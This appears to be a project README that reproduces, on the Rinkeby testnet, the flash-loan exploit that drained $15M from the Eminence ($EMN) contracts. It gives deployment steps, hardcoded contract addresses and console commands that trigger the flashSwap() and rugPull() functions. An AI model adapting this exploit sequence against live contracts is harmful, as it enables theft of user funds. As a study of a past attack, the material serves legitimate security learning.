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For purely educational purposes, I've put together what I think was in the smart contract that drained $15M out of $EMN. The swap rates are a bit skewered on testnet which kills the arb exploit but the flash loan sequence is the same.

Great explanation of the $EMN exploit here

Note: All my stuff is unaudited. You should always assume there's malicious code in here until proven otherwise. Don't test this in prod.

Project setup

  1. Clone this repo
git clone
  1. Install dependencies
npm i --save @uniswap/v2-core
npm i --save @uniswap/v2-periphery
npm install dotenv
npm install --save truffle-hdwallet-provider
  1. Setup your .env with your PKs and end points to match truffle-config.js
  2. Setup your .gitignore to hide your .env (Important)
  3. Adjust truffle-config.js to point to your desired environment for deployment

Contract setup

  1. Deploy /contracts/BondingCurve.sol manually
  2. Adjust the BondingCurve and IERC20 DAI addresses in /contracts/EminenceCurrencyEMN.sol
BondingCurve constant public CURVE = BondingCurve(0x8a8709cfB1b00D88F9F61eaa4a5e3aDC118E5Fc4);
IERC20 constant public DAI = IERC20(0xc7AD46e0b8a400Bb3C915120d284AafbA8fc4735);
  1. Deploy /contracts/EminenceCurrencyEMN.sol manually
  2. Adjust the BondingCurve and EMN token addresses in /contracts/EminenceCurrencyEaave.sol
BondingCurve constant public CURVE = BondingCurve(0x8a8709cfB1b00D88F9F61eaa4a5e3aDC118E5Fc4);
EminenceCurrencyEaave constant public EMN = EminenceCurrencyEaave(0xbf17593c6B3Bf351cb8C33be6e753aF8eD41Fe01);
  1. Deploy /contracts/EminenceCurrencyEaave.sol manually

Exploit setup

  1. Adjust the execute() function in /contracts/EmnExploitStudy.sol to reference the deployed EMN and eAAVE contracts
// change the two addresses below with your own deployed EMN and eAAVE contracts
address EmnAddress = address(0xbf17593c6B3Bf351cb8C33be6e753aF8eD41Fe01);
address eAaveAddress = address(0xf9325bD4B7249fA70ce37fa8d80426a27675a49e);
  1. Compile and deploy /contracts/EmnExploitStudy.sol via this truffle project
truffle migrate --network rinkeby --skipDryRun
  1. Send some Rinkeby DAI to this the EmnExploitStudy contract you just deployed to cover UniswapV2's 0.3% flash swap fee.

Execute exploit

  1. Jump on console and execute:
truffle console --network rinkeby

EmnExploitStudy.deployed().then(function(instance){return instance.flashSwap()});


  1. Pull all tokens from contract to you.
EmnExploitStudy.deployed().then(function(instance){return instance.rugPull()});


Successful execution on Rinkeby testnet

If you found this useful and would like to send me some gas money:


Thanks, @fifikobayashi.


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